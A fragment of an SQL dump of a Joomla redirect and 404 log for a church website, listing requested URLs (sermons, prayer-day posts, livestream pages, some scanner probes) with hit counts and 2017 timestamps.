(5889, 'http://www.lifeoasisinternationalchurch.org/template-info/musi', NULL, '', '', 1, 0, '2017-08-05 05:23:13', '0000-00-00 00:00:00', 301),
(5890, 'http://lifeoasisinternationalchurch.org//xmlrpc.php', NULL, 'http://www.google.com.hk', '', 1, 0, '2017-08-05 11:10:01', '0000-00-00 00:00:00', 301),
(5891, 'http://lifeoasisinternationalchurch.org/csi?s=instant_proxy&v=2&action=menuafterload&id=ocihwz3za4f1-agwgomyca', NULL, 'http://lifeoasisinternationalchurch.org/', '', 1, 0, '2017-08-06 14:31:40', '0000-00-00 00:00:00', 301),
(5892, 'http://lifeoasisinternationalchurch.org/registration/installation/index.php', NULL, 'http://lifeoasisinternationalchurch.org/registration/installation/index.php', '', 3, 0, '2017-08-06 17:16:07', '0000-00-00 00:00:00', 301),
(5893, 'http://www.lifeoasisinternationalchurch.org/?itemid=1123', NULL, '', '', 12, 0, '2017-08-06 17:23:15', '0000-00-00 00:00:00', 301),
(5894, 'http://www.lifeoasisinternationalchurch.org/web-of-wisdom-minister-s-conference?view=event&itid=1', NULL, '', '', 1, 0, '2017-08-07 09:20:30', '0000-00-00 00:00:00', 301),
(5895, 'http://www.lifeoasisinternationalchurch.org/web-of-wisdom-minister-s-conference?task=loginorreg&return=1', NULL, '', '', 1, 0, '2017-08-07 09:37:43', '0000-00-00 00:00:00', 301),
(5896, 'http://www.lifeoasisinternationalchurch.org/web-of-wisdom-minister-s-conference?view=locationmap&itid=1&tmpl=component', NULL, '', '', 1, 0, '2017-08-07 09:53:01', '0000-00-00 00:00:00', 301),
(5897, 'https://lifeoasisinternationalchurch.org/?itemid=1123', NULL, '', '', 2, 0, '2017-08-07 11:44:05', '0000-00-00 00:00:00', 301),
(5898, 'http://lifeoasisinternationalchurch.org/web-of-wisdom-minister-s-conference', NULL, 'http://lifeoasisinternationalchurch.org/', '', 1, 0, '2017-08-07 13:54:02', '0000-00-00 00:00:00', 301),
(5899, 'http://lifeoasisinternationalchurch.org/registration/twitter.com/reverendareogun', NULL, '', '', 1, 0, '2017-08-07 16:07:38', '0000-00-00 00:00:00', 301),
(5900, 'http://lifeoasisinternationalchurch.org/logs/logs.php', NULL, 'http://lifeoasisinternationalchurch.org/logs/logs.php', '', 1, 0, '2017-08-07 16:26:19', '0000-00-00 00:00:00', 301),
(5901, 'http://lifeoasisinternationalchurch.org/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/uplo.php', NULL, 'http://lifeoasisinternationalchurch.org/media/editors/tinymce/jscripts/tiny_mce/themes/simple/skins/o2k7/img/uplo.php', '', 1, 0, '2017-08-07 18:52:55', '0000-00-00 00:00:00', 301),
(5902, 'http://www.lifeoasisinternationalchurch.org/trainning', NULL, 'http://www.lifeoasisinternationalchurch.org/trainning', '', 1, 0, '2017-08-07 21:56:03', '0000-00-00 00:00:00', 301),
(5903, 'http://lifeoasisinternationalchurch.org/language/includes.php', NULL, 'http://lifeoasisinternationalchurch.org/language/includes.php', '', 1, 0, '2017-08-08 02:52:50', '0000-00-00 00:00:00', 301),
(5904, 'http://lifeoasisinternationalchurch.org/meniacle/wp-blog-header.php', NULL, '', '', 1, 0, '2017-08-08 06:52:17', '0000-00-00 00:00:00', 301),
(5905, 'http://lifeoasisinternationalchurch.org/registration/', NULL, '', '', 1, 0, '2017-08-08 07:14:19', '0000-00-00 00:00:00', 301),
(5906, 'https://www.lifeoasisinternationalchurch.org/featured-messages/18-loic/50-young-achievers', NULL, '', '', 6, 0, '2017-08-08 18:25:06', '0000-00-00 00:00:00', 301),
(5907, 'https://lifeoasisinternationalchurch.org/registration', NULL, '', '', 2, 0, '2017-08-08 18:52:49', '0000-00-00 00:00:00', 301),
(5908, 'https://lifeoasisinternationalchurch.org/registration/index.php/component/users/?view=reset', NULL, '', '', 2, 0, '2017-08-08 19:40:37', '0000-00-00 00:00:00', 301),
(5909, 'https://www.lifeoasisinternationalchurch.org/wow2017/twitter.com/reverendareogun', NULL, '', '', 14, 0, '2017-08-08 19:47:38', '0000-00-00 00:00:00', 301),
(5910, 'https://lifeoasisinternationalchurch.org/404testpage4525d2fdc', NULL, 'http://sucuri.net', '', 3094, 0, '2017-08-08 21:48:05', '0000-00-00 00:00:00', 301),
(5911, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/3-dark-side-of-the-anointing-1', NULL, '', '', 882, 0, '2017-08-09 00:49:17', '0000-00-00 00:00:00', 301),
(5912, 'https://www.lifeoasisinternationalchurch.org/component/content/article/12-sample-content/17-sample-content-6', NULL, '', '', 1, 0, '2017-08-09 01:11:11', '0000-00-00 00:00:00', 301),
(5913, 'https://www.lifeoasisinternationalchurch.org/component/content/article/12-sample-content/14-sample-content-3', NULL, '', '', 1, 0, '2017-08-09 01:45:11', '0000-00-00 00:00:00', 301),
(5914, 'https://www.lifeoasisinternationalchurch.org/component/content/article/12-sample-content/16-sample-content-5', NULL, '', '', 3, 0, '2017-08-09 02:38:34', '0000-00-00 00:00:00', 301),
(5915, 'https://www.lifeoasisinternationalchurch.org/?itemid=1123', NULL, '', '', 11, 0, '2017-08-09 02:40:49', '0000-00-00 00:00:00', 301),
(5916, 'https://www.lifeoasisinternationalchurch.org/component/content/article/12-sample-content/12-sample-content-1', NULL, '', '', 3, 0, '2017-08-09 02:42:33', '0000-00-00 00:00:00', 301),
(5917, 'https://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/1', NULL, '', '', 2, 0, '2017-08-09 07:14:30', '0000-00-00 00:00:00', 301),
(5918, 'https://www.lifeoasisinternationalchurch.org/index.php/videos', NULL, '', '', 49, 0, '2017-08-09 08:21:53', '0000-00-00 00:00:00', 301),
(5919, 'https://lifeoasisinternationalchurch.org/registration/index.php/component/users/?view=remind', NULL, '', '', 1, 0, '2017-08-09 14:06:35', '0000-00-00 00:00:00', 301),
(5920, 'https://lifeoasisinternationalchurch.org/lifestreaming', NULL, '', '', 13, 0, '2017-08-09 16:09:22', '0000-00-00 00:00:00', 301),
(5921, 'https://lifeoasisinternationalchurch.org/livestreaming', NULL, '', '', 132, 0, '2017-08-09 16:09:46', '0000-00-00 00:00:00', 301),
(5922, 'https://www.lifeoasisinternationalchurch.org/resources/youtube-live', NULL, '', '', 130, 0, '2017-08-09 16:33:47', '0000-00-00 00:00:00', 301),
(5923, 'https://www.lifeoasisinternationalchurch.org/resources/live-streaming/youtube', NULL, '', '', 1, 0, '2017-08-09 17:11:39', '0000-00-00 00:00:00', 301),
(5924, 'https://www.lifeoasisinternationalchurch.org/resources/baptism', NULL, '', '', 57, 0, '2017-08-09 17:18:40', '0000-00-00 00:00:00', 301),
(5925, 'https://www.lifeoasisinternationalchurch.org/main-streaming', NULL, '', '', 57, 0, '2017-08-09 18:31:06', '0000-00-00 00:00:00', 301),
(5926, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/speaker/2-rev-olusola-ayodele-areogun', NULL, '', '', 59, 0, '2017-08-09 19:43:56', '0000-00-00 00:00:00', 301),
(5927, 'https://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/8-enemies-of-gods-word-2?layout=popup&tmpl=component', NULL, '', '', 1, 0, '2017-08-09 21:45:55', '0000-00-00 00:00:00', 301),
(5928, 'https://www.lifeoasisinternationalchurch.org/templates/rt_ionosphere/css/css-a7413756639d75a4b8ce2f4ac085019d.php', NULL, 'http://www.lifeoasisinternationalchurch.org/component/content/', '', 21, 0, '2017-08-09 22:39:02', '0000-00-00 00:00:00', 301),
(5929, 'https://www.lifeoasisinternationalchurch.org/media/system/css/css-d88325c26fccffc16fdcbe6895c17519.php', NULL, 'http://www.lifeoasisinternationalchurch.org/component/content/', '', 52, 0, '2017-08-09 22:39:02', '0000-00-00 00:00:00', 301),
(5930, 'https://www.lifeoasisinternationalchurch.org/contact-us/church-locations', NULL, '', '', 94, 0, '2017-08-10 01:26:12', '0000-00-00 00:00:00', 301),
(5931, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermons/0/0?start=20', NULL, '', '', 14, 0, '2017-08-10 01:42:35', '0000-00-00 00:00:00', 301),
(5932, 'https://www.lifeoasisinternationalchurch.org/template-info-2/our-service-schedule', NULL, '', '', 9, 0, '2017-08-10 01:46:59', '0000-00-00 00:00:00', 301),
(5933, 'https://www.lifeoasisinternationalchurch.org/index.php/147-day-20', NULL, '', '', 17, 0, '2017-08-10 04:20:57', '0000-00-00 00:00:00', 301),
(5934, 'https://lifeoasisinternationalchurch.org/prv8.php', NULL, '', '', 5, 0, '2017-08-10 04:44:10', '0000-00-00 00:00:00', 301),
(5935, 'https://www.lifeoasisinternationalchurch.org/index.php/209-2015-day-35', NULL, '', '', 28, 0, '2017-08-10 05:24:11', '0000-00-00 00:00:00', 301),
(5936, 'https://www.lifeoasisinternationalchurch.org/?id=featured&format=feed&type=rss', NULL, '', '', 155, 0, '2017-08-10 05:33:53', '0000-00-00 00:00:00', 301),
(5937, 'https://lifeoasisinternationalchurch.org/wow2017/twitter.com/reverendareogun', NULL, '', '', 8, 0, '2017-08-10 05:42:13', '0000-00-00 00:00:00', 301),
(5938, 'https://www.lifeoasisinternationalchurch.org/index.php/169-prophetic-words-for-day-5', NULL, '', '', 18, 0, '2017-08-10 07:06:33', '0000-00-00 00:00:00', 301),
(5939, 'https://www.lifeoasisinternationalchurch.org/templates/rt_ionosphere/roksprocket/layouts/features/themes/slideshow/css-d768001f3c2bf8ee35738bc5c28af2db.php', NULL, 'http://www.lifeoasisinternationalchurch.org/2-uncategorised/71-maintenance', '', 20, 0, '2017-08-10 08:50:18', '0000-00-00 00:00:00', 301),
(5940, 'https://www.lifeoasisinternationalchurch.org/templates/rt_ionosphere/roksprocket/layouts/headlines/themes/default/css-be655ee638bd52b1c1503fcccf4f9864.php', NULL, 'http://www.lifeoasisinternationalchurch.org/2-uncategorised/71-maintenance', '', 20, 0, '2017-08-10 08:50:18', '0000-00-00 00:00:00', 301),
(5941, 'https://www.lifeoasisinternationalchurch.org/templates/rt_ionosphere/css/css-5cfcfda318d771d4268420865bce0950.php', NULL, 'http://www.lifeoasisinternationalchurch.org/2-uncategorised/71-maintenance', '', 34, 0, '2017-08-10 08:50:19', '0000-00-00 00:00:00', 301),
(5942, 'https://www.lifeoasisinternationalchurch.org/media/com_acymailing/css/css-6519469ace9dc29cf2caa5b8bed4a411.php', NULL, 'http://www.lifeoasisinternationalchurch.org/2-uncategorised/71-maintenance', '', 20, 0, '2017-08-10 08:50:19', '0000-00-00 00:00:00', 301),
(5943, 'https://www.lifeoasisinternationalchurch.org/web-of-wisdom-minister-s-conference', NULL, '', '', 19, 0, '2017-08-10 09:08:07', '0000-00-00 00:00:00', 301),
(5944, 'https://lifeoasisinternationalchurch.org/index.php?option=com_comprofiler&task=registers', NULL, '', '', 34, 0, '2017-08-10 14:19:55', '0000-00-00 00:00:00', 301),
(5945, 'https://www.lifeoasisinternationalchurch.org/resources/salvation', NULL, '', '', 77, 0, '2017-08-10 15:58:38', '0000-00-00 00:00:00', 301),
(5946, 'https://www.lifeoasisinternationalchurch.org/index.php/mp3-messages', NULL, '', '', 74, 0, '2017-08-10 19:03:48', '0000-00-00 00:00:00', 301),
(5947, 'https://www.lifeoasisinternationalchurch.org/loic/churchlocations.php', NULL, '', '', 53, 0, '2017-08-10 21:05:20', '0000-00-00 00:00:00', 301),
(5948, 'https://lifeoasisinternationalchurch.org/index.php/252-day-16-of-21-days-fasting-and-prayer-october-2', NULL, '', '', 17, 0, '2017-08-11 02:27:05', '0000-00-00 00:00:00', 301),
(5949, 'https://lifeoasisinternationalchurch.org/language/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/language/logo_img.php', '', 6, 0, '2017-08-11 15:19:40', '0000-00-00 00:00:00', 301),
(5950, 'https://lifeoasisinternationalchurch.org/index.php/281-day-21-of-21-days-fasting-and-prayer-november', NULL, '', '', 15, 0, '2017-08-11 16:00:17', '0000-00-00 00:00:00', 301),
(5951, 'https://lifeoasisinternationalchurch.org/index.php/278-day-18-of-21-days-fasting-and-prayer-november', NULL, '', '', 13, 0, '2017-08-11 16:14:59', '0000-00-00 00:00:00', 301),
(5952, 'https://lifeoasisinternationalchurch.org/component/joomailermailchimpintegration/', NULL, 'https://www.lifeoasisinternationalchurch.org/streaming', '', 19, 0, '2017-08-11 17:07:34', '0000-00-00 00:00:00', 301),
(5953, 'https://www.lifeoasisinternationalchurch.org/resources/stream', NULL, '', '', 217, 0, '2017-08-11 18:11:17', '0000-00-00 00:00:00', 301),
(5954, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages', NULL, '', '', 28, 0, '2017-08-11 19:19:09', '0000-00-00 00:00:00', 301),
(5955, 'https://lifeoasisinternationalchurch.org/logs/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/logs/logo_img.php', '', 10, 0, '2017-08-11 19:53:14', '0000-00-00 00:00:00', 301),
(5956, 'https://lifeoasisinternationalchurch.org/layouts/logo_img.php', NULL, 'http://lifeoasisinternationalchurch.org/layouts/logo_img.php', '', 4, 0, '2017-08-11 20:07:03', '0000-00-00 00:00:00', 301),
(5957, 'https://lifeoasisinternationalchurch.org/resources', NULL, '', '', 12, 0, '2017-08-11 20:58:49', '0000-00-00 00:00:00', 301),
(5958, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/2-building-a-bilblical-relationship-with-the-word-of-god-2', NULL, '', '', 67, 0, '2017-08-12 00:28:34', '0000-00-00 00:00:00', 301),
(5959, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/pregnant', NULL, '', '', 5, 0, '2017-08-12 08:20:51', '0000-00-00 00:00:00', 301),
(5960, 'https://lifeoasisinternationalchurch.org/root_site/wow2017', NULL, 'https://lifeoasisinternationalchurch.org/root_site/', '', 1, 0, '2017-08-12 11:53:29', '0000-00-00 00:00:00', 301),
(5961, 'https://lifeoasisinternationalchurch.org/index.php/254-day-19-of-22-days-fasting-and-prayer-october', NULL, '', '', 12, 0, '2017-08-12 11:54:57', '0000-00-00 00:00:00', 301),
(5962, 'https://www.lifeoasisinternationalchurch.org/index.php/guidelines', NULL, '', '', 18, 0, '2017-08-12 12:45:55', '0000-00-00 00:00:00', 301),
(5963, 'https://www.lifeoasisinternationalchurch.org/index.php/144-day-18', NULL, '', '', 13, 0, '2017-08-12 12:52:18', '0000-00-00 00:00:00', 301),
(5964, 'https://www.lifeoasisinternationalchurch.org/index.php/167-day-39', NULL, '', '', 17, 0, '2017-08-12 12:55:46', '0000-00-00 00:00:00', 301),
(5965, 'https://www.lifeoasisinternationalchurch.org/index.php/158-day-30', NULL, '', '', 17, 0, '2017-08-12 13:02:37', '0000-00-00 00:00:00', 301),
(5966, 'https://www.lifeoasisinternationalchurch.org/index.php/148-day-21', NULL, '', '', 14, 0, '2017-08-12 13:11:42', '0000-00-00 00:00:00', 301),
(5967, 'https://www.lifeoasisinternationalchurch.org/index.php/138-day-12', NULL, '', '', 14, 0, '2017-08-12 13:15:54', '0000-00-00 00:00:00', 301),
(5968, 'https://www.lifeoasisinternationalchurch.org/index.php/141-day-15', NULL, '', '', 14, 0, '2017-08-12 13:20:38', '0000-00-00 00:00:00', 301),
(5969, 'https://www.lifeoasisinternationalchurch.org/index.php/165-day-37', NULL, '', '', 16, 0, '2017-08-12 13:27:44', '0000-00-00 00:00:00', 301),
(5970, 'https://www.lifeoasisinternationalchurch.org/index.php/145-day-19', NULL, '', '', 14, 0, '2017-08-12 13:37:19', '0000-00-00 00:00:00', 301),
(5971, 'https://www.lifeoasisinternationalchurch.org/index.php/149-day-22', NULL, '', '', 14, 0, '2017-08-12 13:46:21', '0000-00-00 00:00:00', 301),
(5972, 'https://www.lifeoasisinternationalchurch.org/11-demo-articles/11-about-joomla', NULL, '', '', 2, 0, '2017-08-12 13:49:15', '0000-00-00 00:00:00', 301),
(5973, 'https://www.lifeoasisinternationalchurch.org/index.php/142-day-16', NULL, '', '', 17, 0, '2017-08-12 13:51:52', '0000-00-00 00:00:00', 301),
(5974, 'https://www.lifeoasisinternationalchurch.org/index.php/159-day-31', NULL, '', '', 18, 0, '2017-08-12 13:55:51', '0000-00-00 00:00:00', 301),
(5975, 'https://www.lifeoasisinternationalchurch.org/index.php/136-day-10', NULL, '', '', 17, 0, '2017-08-12 14:01:08', '0000-00-00 00:00:00', 301),
(5976, 'https://www.lifeoasisinternationalchurch.org/index.php/162-day-34', NULL, '', '', 22, 0, '2017-08-12 14:05:39', '0000-00-00 00:00:00', 301),
(5977, 'https://www.lifeoasisinternationalchurch.org/index.php/151-day-24', NULL, '', '', 14, 0, '2017-08-12 14:11:20', '0000-00-00 00:00:00', 301),
(5978, 'https://www.lifeoasisinternationalchurch.org/index.php/137-day-11', NULL, '', '', 14, 0, '2017-08-12 14:16:06', '0000-00-00 00:00:00', 301),
(5979, 'https://www.lifeoasisinternationalchurch.org/index.php/133-2014-8', NULL, '', '', 19, 0, '2017-08-12 14:26:44', '0000-00-00 00:00:00', 301),
(5980, 'https://www.lifeoasisinternationalchurch.org/index.php/154-day-27', NULL, '', '', 14, 0, '2017-08-12 14:31:51', '0000-00-00 00:00:00', 301),
(5981, 'https://www.lifeoasisinternationalchurch.org/index.php/153-day-26', NULL, '', '', 16, 0, '2017-08-12 14:36:07', '0000-00-00 00:00:00', 301),
(5982, 'https://lifeoasisinternationalchurch.org/ad', NULL, '', '', 4, 0, '2017-08-12 18:05:02', '0000-00-00 00:00:00', 301),
(5983, 'https://lifeoasisinternationalchurch.org/https://lifeoasisinternationalchurch.org/', NULL, '', '', 98, 0, '2017-08-12 18:38:30', '0000-00-00 00:00:00', 301),
(5984, 'https://www.lifeoasisinternationalchurch.org/train', NULL, '', '', 1, 0, '2017-08-12 19:40:36', '0000-00-00 00:00:00', 301),
(5985, 'https://www.lifeoasisinternationalchurch.org/tra', NULL, '', '', 3, 0, '2017-08-12 19:40:36', '0000-00-00 00:00:00', 301),
(5986, 'https://www.lifeoasisinternationalchurch.org/traini', NULL, '', '', 2, 0, '2017-08-12 19:40:36', '0000-00-00 00:00:00', 301),
(5987, 'https://www.lifeoasisinternationalchurch.org/trai', NULL, '', '', 3, 0, '2017-08-12 19:40:36', '0000-00-00 00:00:00', 301),
(5988, 'https://www.lifeoasisinternationalchurch.org/trainin', NULL, '', '', 2, 0, '2017-08-12 19:40:36', '0000-00-00 00:00:00', 301),
(5989, 'https://www.lifeoasisinternationalchurch.org/tr', NULL, '', '', 4, 0, '2017-08-12 19:40:36', '0000-00-00 00:00:00', 301),
(5990, 'https://lifeoasisinternationalchurch.org/index.php/249-day-14-of-21-days-fasting-and-prayer-october', NULL, '', '', 15, 0, '2017-08-12 23:14:48', '0000-00-00 00:00:00', 301),
(5991, 'https://www.lifeoasisinternationalchurch.org/index.php/163-day-35', NULL, '', '', 17, 0, '2017-08-12 23:25:47', '0000-00-00 00:00:00', 301),
(5992, 'https://www.lifeoasisinternationalchurch.org/index.php/140-day-14', NULL, '', '', 13, 0, '2017-08-12 23:31:13', '0000-00-00 00:00:00', 301),
(5993, 'https://www.lifeoasisinternationalchurch.org/index.php/156-day-29', NULL, '', '', 15, 0, '2017-08-12 23:36:53', '0000-00-00 00:00:00', 301),
(5994, 'https://www.lifeoasisinternationalchurch.org/index.php/161-day-33', NULL, '', '', 17, 0, '2017-08-12 23:41:08', '0000-00-00 00:00:00', 301),
(5995, 'https://www.lifeoasisinternationalchurch.org/index.php/139-day-13', NULL, '', '', 13, 0, '2017-08-12 23:44:44', '0000-00-00 00:00:00', 301),
(5996, 'https://www.lifeoasisinternationalchurch.org/index.php/143-day-17', NULL, '', '', 13, 0, '2017-08-12 23:55:53', '0000-00-00 00:00:00', 301),
(5997, 'https://www.lifeoasisinternationalchurch.org/index.php/150-day-23', NULL, '', '', 13, 0, '2017-08-13 00:00:17', '0000-00-00 00:00:00', 301),
(5998, 'https://www.lifeoasisinternationalchurch.org/index.php/176-2015-day-1', NULL, '', '', 15, 0, '2017-08-13 00:06:38', '0000-00-00 00:00:00', 301),
(5999, 'https://www.lifeoasisinternationalchurch.org/index.php/180-2015-day-4', NULL, '', '', 16, 0, '2017-08-13 00:16:22', '0000-00-00 00:00:00', 301),
(6000, 'https://www.lifeoasisinternationalchurch.org/index.php/183-2015-day-7', NULL, '', '', 15, 0, '2017-08-13 00:21:57', '0000-00-00 00:00:00', 301),
(6001, 'https://lifeoasisinternationalchurch.org/component/content/article/18-loic/50-young-achievers', NULL, '', '', 6, 0, '2017-08-13 02:26:50', '0000-00-00 00:00:00', 301),
(6002, 'https://www.lifeoasisinternationalchurch.org/resources/hd', NULL, '', '', 28, 0, '2017-08-13 06:39:05', '0000-00-00 00:00:00', 301),
(6003, 'https://www.lifeoasisinternationalchurch.org/privae', NULL, '', '', 1, 0, '2017-08-13 06:45:42', '0000-00-00 00:00:00', 301),
(6004, 'https://lifeoasisinternationalchurch.org/streaming-private', NULL, '', '', 8, 0, '2017-08-13 07:01:24', '0000-00-00 00:00:00', 301),
(6005, 'https://lifeoasisinternationalchurch.org/loic/revolusola.php', NULL, '', '', 36, 0, '2017-08-13 07:07:32', '0000-00-00 00:00:00', 301),
(6006, 'https://www.lifeoasisinternationalchurch.org/mp3-messages', NULL, '', '', 142, 0, '2017-08-13 07:08:36', '0000-00-00 00:00:00', 301),
(6007, 'https://www.lifeoasisinternationalchurch.org/private streaming', NULL, '', '', 51, 0, '2017-08-13 07:21:07', '0000-00-00 00:00:00', 301),
(6008, 'https://lifeoasisinternationalchurch.org/resources/live-streaming/private', NULL, '', '', 39, 0, '2017-08-13 07:25:29', '0000-00-00 00:00:00', 301),
(6009, 'https://lifeoasisinternationalchurch.org/resources/private', NULL, '', '', 136, 0, '2017-08-13 07:26:22', '0000-00-00 00:00:00', 301),
(6010, 'https://lifeoasisinternationalchurch.org/li', NULL, '', '', 3, 0, '2017-08-13 07:29:05', '0000-00-00 00:00:00', 301),
(6011, 'https://lifeoasisinternationalchurch.org/liv', NULL, '', '', 2, 0, '2017-08-13 07:29:05', '0000-00-00 00:00:00', 301),
(6012, 'https://lifeoasisinternationalchurch.org/live', NULL, '', '', 15, 0, '2017-08-13 07:29:05', '0000-00-00 00:00:00', 301),
(6013, 'https://lifeoasisinternationalchurch.org/lives', NULL, '', '', 1, 0, '2017-08-13 07:29:05', '0000-00-00 00:00:00', 301),
(6014, 'https://lifeoasisinternationalchurch.org/livest', NULL, '', '', 2, 0, '2017-08-13 07:29:06', '0000-00-00 00:00:00', 301),
(6015, 'https://lifeoasisinternationalchurch.org/livestrr', NULL, '', '', 1, 0, '2017-08-13 07:29:06', '0000-00-00 00:00:00', 301),
(6016, 'https://lifeoasisinternationalchurch.org/livestr', NULL, '', '', 2, 0, '2017-08-13 07:29:07', '0000-00-00 00:00:00', 301),
(6017, 'https://lifeoasisinternationalchurch.org/livestra', NULL, '', '', 1, 0, '2017-08-13 07:29:07', '0000-00-00 00:00:00', 301),
(6018, 'https://lifeoasisinternationalchurch.org/livestram', NULL, '', '', 1, 0, '2017-08-13 07:29:08', '0000-00-00 00:00:00', 301),
(6019, 'https://lifeoasisinternationalchurch.org/livestre', NULL, '', '', 1, 0, '2017-08-13 07:29:09', '0000-00-00 00:00:00', 301),
(6020, 'https://lifeoasisinternationalchurch.org/livestrea', NULL, '', '', 1, 0, '2017-08-13 07:29:10', '0000-00-00 00:00:00', 301),
(6021, 'https://lifeoasisinternationalchurch.org/livestream', NULL, '', '', 21, 0, '2017-08-13 07:29:10', '0000-00-00 00:00:00', 301),
(6022, 'https://lifeoasisinternationalchurch.org/livestreami', NULL, '', '', 1, 0, '2017-08-13 07:29:10', '0000-00-00 00:00:00', 301),
(6023, 'https://lifeoasisinternationalchurch.org/livestreamin', NULL, '', '', 1, 0, '2017-08-13 07:29:11', '0000-00-00 00:00:00', 301),
(6024, 'https://lifeoasisinternationalchurch.org/p', NULL, '', '', 3, 0, '2017-08-13 07:51:41', '0000-00-00 00:00:00', 301),
(6025, 'https://lifeoasisinternationalchurch.org/livestres', NULL, '', '', 1, 0, '2017-08-13 07:51:45', '0000-00-00 00:00:00', 301),
(6026, 'https://lifeoasisinternationalchurch.org/t', NULL, 'https://lifeoasisinternationalchurch.org/youtube', '', 148, 0, '2017-08-13 10:23:06', '0000-00-00 00:00:00', 301),
(6027, 'https://www.lifeoasisinternationalchurch.org/index.php/226-2016-day-9', NULL, '', '', 15, 0, '2017-08-13 10:31:22', '0000-00-00 00:00:00', 301),
(6028, 'https://www.lifeoasisinternationalchurch.org/index.php/179-2015-day-3', NULL, '', '', 16, 0, '2017-08-13 10:36:29', '0000-00-00 00:00:00', 301),
(6029, 'https://www.lifeoasisinternationalchurch.org/index.php/224-2016-day-7', NULL, '', '', 19, 0, '2017-08-13 10:41:12', '0000-00-00 00:00:00', 301),
(6030, 'https://www.lifeoasisinternationalchurch.org/index.php/178-2015-day-2', NULL, '', '', 17, 0, '2017-08-13 10:45:08', '0000-00-00 00:00:00', 301),
(6031, 'https://www.lifeoasisinternationalchurch.org/index.php/219-2016-day-2', NULL, '', '', 17, 0, '2017-08-13 10:52:30', '0000-00-00 00:00:00', 301),
(6032, 'https://www.lifeoasisinternationalchurch.org/index.php/218-2016-day-1', NULL, '', '', 17, 0, '2017-08-13 10:55:09', '0000-00-00 00:00:00', 301),
(6033, 'https://www.lifeoasisinternationalchurch.org/index.php/220-2016-day-3', NULL, '', '', 16, 0, '2017-08-13 11:00:43', '0000-00-00 00:00:00', 301),
(6034, 'https://www.lifeoasisinternationalchurch.org/index.php/185-2015-day-9', NULL, '', '', 16, 0, '2017-08-13 11:04:03', '0000-00-00 00:00:00', 301),
(6035, 'https://www.lifeoasisinternationalchurch.org/index.php/184-2015-day-8', NULL, '', '', 17, 0, '2017-08-13 11:10:51', '0000-00-00 00:00:00', 301),
(6036, 'https://www.lifeoasisinternationalchurch.org/index.php/234-2016-day-17', NULL, '', '', 24, 0, '2017-08-13 11:16:23', '0000-00-00 00:00:00', 301),
(6037, 'https://www.lifeoasisinternationalchurch.org/component/content/article/7-kindom-builder/33-prayer-a-fasting-day-24', NULL, '', '', 8, 0, '2017-08-13 11:17:14', '0000-00-00 00:00:00', 301),
(6038, 'https://www.lifeoasisinternationalchurch.org/index.php/195-2015-day-20', NULL, '', '', 15, 0, '2017-08-13 11:22:03', '0000-00-00 00:00:00', 301),
(6039, 'https://www.lifeoasisinternationalchurch.org/index.php/241-2016-day-24', NULL, '', '', 27, 0, '2017-08-13 11:26:27', '0000-00-00 00:00:00', 301),
(6040, 'https://www.lifeoasisinternationalchurch.org/index.php/199-2015-day-24', NULL, '', '', 15, 0, '2017-08-13 11:31:51', '0000-00-00 00:00:00', 301),
(6041, 'https://www.lifeoasisinternationalchurch.org/index.php/188-2015-day-11', NULL, '', '', 16, 0, '2017-08-13 11:36:14', '0000-00-00 00:00:00', 301),
(6042, 'https://www.lifeoasisinternationalchurch.org/index.php/197-2015-day-22', NULL, '', '', 15, 0, '2017-08-13 11:41:09', '0000-00-00 00:00:00', 301),
(6043, 'https://www.lifeoasisinternationalchurch.org/index.php/229-2016-day-12', NULL, '', '', 18, 0, '2017-08-13 11:47:04', '0000-00-00 00:00:00', 301),
(6044, 'https://www.lifeoasisinternationalchurch.org/index.php/233-2016-day-16', NULL, '', '', 22, 0, '2017-08-13 11:51:04', '0000-00-00 00:00:00', 301),
(6045, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/correct', NULL, '', '', 5, 0, '2017-08-13 11:52:10', '0000-00-00 00:00:00', 301),
(6046, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/holy', NULL, '', '', 4, 0, '2017-08-13 11:52:11', '0000-00-00 00:00:00', 301),
(6047, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/last', NULL, '', '', 5, 0, '2017-08-13 11:52:12', '0000-00-00 00:00:00', 301),
(6048, 'https://www.lifeoasisinternationalchurch.org/index.php/232-2016-day-15', NULL, '', '', 17, 0, '2017-08-13 11:56:36', '0000-00-00 00:00:00', 301),
(6049, 'https://www.lifeoasisinternationalchurch.org/index.php/231-2016-day-14', NULL, '', '', 16, 0, '2017-08-13 11:59:14', '0000-00-00 00:00:00', 301),
(6050, 'https://www.lifeoasisinternationalchurch.org/index.php/238-2016-day-21', NULL, '', '', 28, 0, '2017-08-13 12:06:40', '0000-00-00 00:00:00', 301),
(6051, 'https://www.lifeoasisinternationalchurch.org/index.php/207-2015-day-33', NULL, '', '', 16, 0, '2017-08-13 12:12:16', '0000-00-00 00:00:00', 301),
(6052, 'https://www.lifeoasisinternationalchurch.org/index.php/237-2016-day-20', NULL, '', '', 29, 0, '2017-08-13 12:15:39', '0000-00-00 00:00:00', 301),
(6053, 'https://www.lifeoasisinternationalchurch.org/ private streaming', NULL, '', '', 1, 0, '2017-08-13 13:43:37', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(6054, 'https://www.lifeoasisinternationalchurch.org/gobc2015', NULL, '', '', 324, 0, '2017-08-13 14:35:31', '0000-00-00 00:00:00', 301),
(6055, 'https://lifeoasisinternationalchurch.org/destinytv', NULL, 'http://m.facebook.com/', '', 35, 0, '2017-08-13 16:39:27', '0000-00-00 00:00:00', 301),
(6056, 'https://www.lifeoasisinternationalchurch.org/index.php/182-2015-day-6', NULL, '', '', 16, 0, '2017-08-13 16:42:08', '0000-00-00 00:00:00', 301),
(6057, 'https://www.lifeoasisinternationalchurch.org/index.php/221-2016-day-4', NULL, '', '', 15, 0, '2017-08-13 16:47:02', '0000-00-00 00:00:00', 301),
